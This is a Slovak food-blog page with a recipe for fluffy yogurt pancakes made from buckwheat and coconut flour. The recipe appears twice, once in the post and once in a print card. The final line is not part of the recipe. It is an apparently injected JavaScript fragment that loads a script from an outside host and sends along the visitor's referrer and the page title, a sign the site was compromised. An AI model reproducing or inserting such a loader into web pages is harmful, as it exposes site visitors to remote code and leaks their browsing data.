FoodLover

prinášame pôžitok zo zdravého jedla

  • Blog
    • Recepty
      • Homemade
      • Raňajky
      • Šaláty
      • Polievky
      • Hlavné jedlá
      • Sladké potešenia
      • Slané pochúťky
    • Články
      • Zo života
      • Zdravá výzva
        • Jedálniček
        • Blog
        • Pravidlá pre rok 2016
        • O Whole30
  • Čo robím
    • Kurzy varenia
    • Catering
    • Produkty mandlove
  • O mne
    • Kto som
    • Príbeh
  • Kontakt
You are here: Home / Blog / Recepty / Raňajky / Jogurtové lievance alebo ďalšie dokonalé raňajky

Jogurtové lievance alebo ďalšie dokonalé raňajky

23/01/2016 by Martina Leave a Comment

No opäť som sa mýlila.

Tieto raňajkové lievance sú úplne ako z rozprávky! Jemné, ľahké, nadýchané (fluffy), chuťovo fantastické, a tak neuveriteľne rýchle na prípravu.

V kombinácií s domácim orieškovým maslom, alebo čokoládou chutia podľa mňa najlepšie :). Ich základ tvorí smotanový jogurt, vajíčka, pohánková a kokosová múka. Dosladené sú medíkom a nadýchané vďaka sóde bikarbóne. Je to neuveriteľné, ale nič viac nepotrebujete.

Ďalší výborný dôvod na skoré ranné vstávanie.. :)

IMG_1316

Ingrediencie: (asi 2-3 porcie)

  • 3 vajíčka
  • 1 veľký smotaný Zvolenský jogurt (320g)
  • 1 lyžica medu
  • 3 lyžice hladkej pohánkovej múky
  • 3 lyžice kokosovej múky
  • 1 lyžička sódy bikarbóny
  • vanilka, alebo škorica na dochutenie
  • kokosový olej na opekanie

Postup:

  1. Vajíčka, jogurt a med spolu vyšľaháme.
  2. V miske si zmiešame pohánkovú múku, kokosovú múku, sódu a vanilku, či škoricu.
  3. Obe zmesi premiešame a necháme chvíľku odležať. Ak nechceme použiť kokosovú múku, určite to pôjde aj bez nej. Avšak pohánkovej treba použiť možno aj 2-násobné množstvo. Kokosová múka totiž výborne viaže tekutinu.
  4. Rozpálime kokosový olej a pomocou veľkej lyžice nalievame cesto na panvicu. Ja používam 2 lyžice cesta na jeden lievanec :).
  5. Lievance navrstvíme na tanier a môžeme raňajkovat.
  6. Dobrú chuť.

IMG_1337

Print
Jogurtové lievance alebo ďalšie dokonalé raňajky

Jogurtové lievance alebo ďalšie dokonalé raňajky

Ingredients

  • 3 vajíčka
  • 1 veľký smotaný Zvolenský jogurt (320g)
  • 1 lyžica medu
  • 3 lyžice hladkej pohánkovej múky
  • 3 lyžice kokosovej múky
  • 1 lyžička sódy bikarbóny
  • vanilka, alebo škorica na dochutenie
  • kokosový olej na opekanie

Instructions

  1. Vajíčka, jogurt a med spolu vyšľaháme.
  2. V miske si zmiešame pohánkovú múku, kokosovú múku, sódu a vanilku, či škoricu.
  3. Obe zmesi premiešame a necháme chvíľku odležať. Ak nechceme použiť kokosovú múku, určite to pôjde aj bez nej. Avšak pohánkovej treba použiť možno aj 2-násobné množstvo. Kokosová múka totiž výborne viaže tekutinu.
  4. Rozpálime kokosový olej a pomocou veľkej lyžice nalievame cesto na panvicu. Ja používam 2 lyžice cesta na jeden lievanec :).
  5. Lievance navrstvíme na tanier a môžeme raňajkovat.
  6. Dobrú chuť.
5.0
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;